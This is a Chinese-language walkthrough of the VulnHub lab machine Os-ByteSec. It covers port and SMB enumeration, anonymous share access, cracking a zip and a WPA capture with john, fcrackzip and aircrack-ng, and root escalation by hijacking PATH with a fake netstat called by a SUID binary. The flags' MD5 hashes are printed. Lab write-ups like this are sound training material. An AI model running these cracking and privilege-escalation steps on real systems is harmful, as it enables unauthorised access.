Os-ByteSec

靶机地址hackNos: Os-Bytesec ~ VulnHub

目标为 普通用户的user.txt和root用户的root.txt

靶机配置

靶机网卡配置参考我之前的Os-hackNos-1_witwitwiter的博客-CSDN博客

渗透测试

使用nmap进行端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─# nmap -sV 192.168.5.135   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:34 CST
Nmap scan report for 192.168.5.135 (192.168.5.135)
Host is up (0.00012s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:13:48:B6 (VMware)
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds

使用dirsearch进行目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
─# dirsearch -u "http://192.168.5.135/"

_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877

Output File: /root/.dirsearch/reports/192.168.5.135/_21-08-29_19-39-13.txt

Error Log: /root/.dirsearch/logs/errors-21-08-29_19-39-13.log

Target: http://192.168.5.135/

[19:39:13] Starting:
[19:39:13] 301 - 311B - /js -> http://192.168.5.135/js/
[19:39:13] 301 - 313B - /html -> http://192.168.5.135/html/
[19:39:14] 403 - 278B - /.ht_wsr.txt
[19:39:14] 403 - 278B - /.htaccess.bak1
[19:39:14] 403 - 278B - /.htaccess_extra
[19:39:14] 403 - 278B - /.htaccess.sample
[19:39:14] 403 - 278B - /.htaccess.save
[19:39:14] 403 - 278B - /.htaccess_sc
[19:39:14] 403 - 278B - /.htaccessOLD2
[19:39:14] 403 - 278B - /.htaccess_orig
[19:39:14] 403 - 278B - /.htaccessBAK
[19:39:14] 403 - 278B - /.htm
[19:39:14] 403 - 278B - /.htaccessOLD
[19:39:14] 403 - 278B - /.htaccess.orig
[19:39:14] 403 - 278B - /.htpasswd_test
[19:39:14] 403 - 278B - /.html
[19:39:14] 403 - 278B - /.htpasswds
[19:39:14] 403 - 278B - /.httr-oauth
[19:39:21] 301 - 312B - /css -> http://192.168.5.135/css/
[19:39:23] 301 - 316B - /gallery -> http://192.168.5.135/gallery/
[19:39:23] 200 - 738B - /html/
[19:39:23] 301 - 312B - /img -> http://192.168.5.135/img/
[19:39:23] 200 - 3KB - /index.html
[19:39:23] 200 - 2KB - /js/
[19:39:25] 301 - 313B - /news -> http://192.168.5.135/news/
[19:39:27] 403 - 278B - /server-status
[19:39:27] 403 - 278B - /server-status/

Task Completed

使用nmap测试smb安全

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
└─# nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.5.135

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 19:47 CST
NSE: Loaded 11 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
Initiating ARP Ping Scan at 19:47
Scanning 192.168.5.135 [1 port]
Completed ARP Ping Scan at 19:47, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:47
Completed Parallel DNS resolution of 1 host. at 19:47, 0.01s elapsed
Initiating SYN Stealth Scan at 19:47
Scanning 192.168.5.135 (192.168.5.135) [2 ports]
Discovered open port 445/tcp on 192.168.5.135
Discovered open port 139/tcp on 192.168.5.135
Completed SYN Stealth Scan at 19:47, 0.15s elapsed (2 total ports)
NSE: Script scanning 192.168.5.135.
Initiating NSE at 19:47
Completed NSE at 19:47, 5.17s elapsed
Nmap scan report for 192.168.5.135 (192.168.5.135)
Host is up (0.00049s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:13:48:B6 (VMware)

Host script results:
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_

NSE: Script Post-scanning.
Initiating NSE at 19:47
Completed NSE at 19:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

使用smbmap进行测试,发现可以匿名访问但无权限

1
2
3
4
5
6
7
└─# smbmap -H 192.168.5.135                                                                                                                                                                                    1 ⨯
[+] Guest session IP: 192.168.5.135:445 Name: 192.168.5.135
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (nitin server (Samba, Ubuntu))

使用enum4linux测试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
└─# enum4linux -U 192.168.5.135
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Aug 29 20:11:41 2021

==========================
| Target Information |
==========================
Target ........... 192.168.5.135
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=====================================================
| Enumerating Workgroup/Domain on 192.168.5.135 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

======================================
| Session Check on 192.168.5.135 |
======================================
[+] Server 192.168.5.135 allows sessions using username '', password ''

============================================
| Getting domain SID for 192.168.5.135 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

==============================
| Users on 192.168.5.135 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: smb Name: Desc:

user:[smb] rid:[0x3e8]
enum4linux complete on Sun Aug 29 20:11:41 2021

使用默认参数直接跑enum4linux 192.168.5.135

image-20230628230305489

得到sagar、blackjax、smb这三个用户

经过测试只有smb这个用户的密码在不输入的情况能够读取。即smb用户是空密码。

1
2
3
4
5
6
7
└─# smbmap -u smb  -H 192.168.5.135 
[+] IP: 192.168.5.135:445 Name: 192.168.5.135
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
IPC$ NO ACCESS IPC Service (nitin server (Samba, Ubuntu))

使用smbclient登录进去,提示输入密码,直接回车

1
2
3
4
└─# smbclient //192.168.5.135/smb -U smb
Enter WORKGROUP\smb's password:
Try "help" to get a list of possible commands.
smb: \>

使用ls列出文件

1
2
3
4
5
6
7
8
smb: \> ls
. D 0 Mon Nov 4 19:50:37 2019
.. D 0 Mon Nov 4 19:37:28 2019
main.txt N 10 Mon Nov 4 19:45:38 2019
safe.zip N 3424907 Mon Nov 4 19:50:37 2019

9204224 blocks of size 1024. 6831688 blocks available

使用get下载这两个文件

1
2
3
4
smb: \> get main.txt 
getting file \main.txt of size 10 as main.txt (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \> get safe.zip
getting file \safe.zip of size 3424907 as safe.zip (65581.0 KiloBytes/sec) (average 57666.3 KiloBytes/sec)

查看文件内容

1
2
└─# cat main.txt       
helo

解压safe.zip时发现有密码

1
2
3
4
5
6
└─# unzip safe.zip                            
Archive: safe.zip
[safe.zip] secret.jpg password:
skipping: secret.jpg incorrect password
skipping: user.cap incorrect password

使用john破解密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~]
└─# zip2john safe.zip > safepass 82 ⨯
ver 2.0 efh 5455 efh 7875 safe.zip/secret.jpg PKZIP Encr: 2b chk, TS_chk, cmplen=60550, decmplen=62471, crc=6D48091C
ver 2.0 efh 5455 efh 7875 safe.zip/user.cap PKZIP Encr: 2b chk, TS_chk, cmplen=3364011, decmplen=6920971, crc=717BA9D6
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(root💀kali)-[~]
└─# john safepass
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hacker1 (safe.zip)
1g 0:00:00:00 DONE 2/3 (2021-08-29 21:06) 20.00g/s 1680Kp/s 1680Kc/s 1680KC/s fireballs..faithfaith
Use the "--show" option to display all of the cracked passwords reliably
Session completed

或者使用fcrackzip

1
2
3
4
5
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip


PASSWORD FOUND!!!!: pw == hacker1

得到密码为hacker1

解压后得到secret.jpg和user.cap

图片上没得到什么有用的信息

user.cap是一个wifi抓包

使用aircrack-ng破解密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap


Aircrack-ng 1.6

[00:00:00] 2354/10303727 keys tested (9801.73 k/s)

Time left: 17 minutes, 30 seconds 0.02%

KEY FOUND! [ snowflake ]


Master Key : 88 D4 8C 29 79 BF DF 88 B4 14 0F 5A F3 E8 FB FB
59 95 91 7F ED 3E 93 DB 2A C9 BA FB EE 07 EA 62

Transient Key : 1F 89 42 F4 E2 74 8B 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : ED B5 F7 D9 56 98 B0 5E 25 7D 86 08 C4 D4 02 3D

得到密码snowflake

ssh登录,之前nmap扫描出ssh端口为2525,故加上-p 2525

1
└─# ssh blackjax@192.168.5.135 -p 2525  

使用python3 -c 'import pty;pty.spawn("/bin/bash")'切换shell

得到user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
blackjax@nitin:~$ cat /home/blackjax/user.txt 
_ _ _____ ______ _____ ______ _ _____
| | | |/ ____| ____| __ \ | ____| | /\ / ____|
| | | | (___ | |__ | |__) |_____| |__ | | / \ | | __
| | | |\___ \| __| | _ /______| __| | | / /\ \| | |_ |
| |__| |____) | |____| | \ \ | | | |____ / ____ \ |__| |
\____/|_____/|______|_| \_\ |_| |______/_/ \_\_____|



Go To Root.

MD5-HASH : f589a6959f3e04037eb2b3eb0ff726ac

尝试sudo提权,失败后查找具有root权限的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
blackjax@nitin:~$ sudo su root
[sudo] password for blackjax:
blackjax is not in the sudoers file. This incident will be reported.
blackjax@nitin:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/netscan
/usr/bin/sudo
/bin/ping6
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/ntfs-3g

使用netscan,发现与netstat -natp差不多

1
2
3
4
5
6
7
8
9
10
11
12
blackjax@nitin:~$ netscan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:2525 0.0.0.0:* LISTEN 1153/sshd
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 1010/smbd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 1181/mysqld
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 1010/smbd
tcp 0 0 192.168.5.135:2525 192.168.5.129:54132 ESTABLISHED 3415/sshd: blackjax
tcp6 0 0 :::2525 :::* LISTEN 1153/sshd
tcp6 0 0 :::445 :::* LISTEN 1010/smbd
tcp6 0 0 :::139 :::* LISTEN 1010/smbd
tcp6 0 0 :::80 :::* LISTEN 1264/apache2

使用xxd /usr/bin/netscan查看二进制文件,发现确实调用了netstat -natp。

image-20230628230353627

那么尝试用这个命令进行提权,注意这里写入的文件是netstat而不是netscan

1
2
3
4
5
6
7
8
blackjax@nitin:~$ cd /tmp
blackjax@nitin:/tmp$ echo "/bin/bash" >netstat
blackjax@nitin:/tmp$ chmod 775 netstat
blackjax@nitin:/tmp$ export PATH=/tmp:$PATH
blackjax@nitin:/tmp$ netscan
root@nitin:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(blackjax)

获得最后的root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@nitin:/tmp# cat /root/root.txt 
____ ____ ____ ______ ________ ___ ______
/ __ \/ __ \/ __ \/_ __/ / ____/ / / | / ____/
/ /_/ / / / / / / / / / / /_ / / / /| |/ / __
/ _, _/ /_/ / /_/ / / / / __/ / /___/ ___ / /_/ /
/_/ |_|\____/\____/ /_/____/_/ /_____/_/ |_\____/
/_____/
Conguratulation..

MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Author : Rahul Gehlaut

Contact : https://www.linkedin.com/in/rahulgehlaut/

WebSite : jameshacker.me

注意事项

提权所用的命令是netcan,netscan调用的命令是netstat,所以用netstat来劫持环境变量。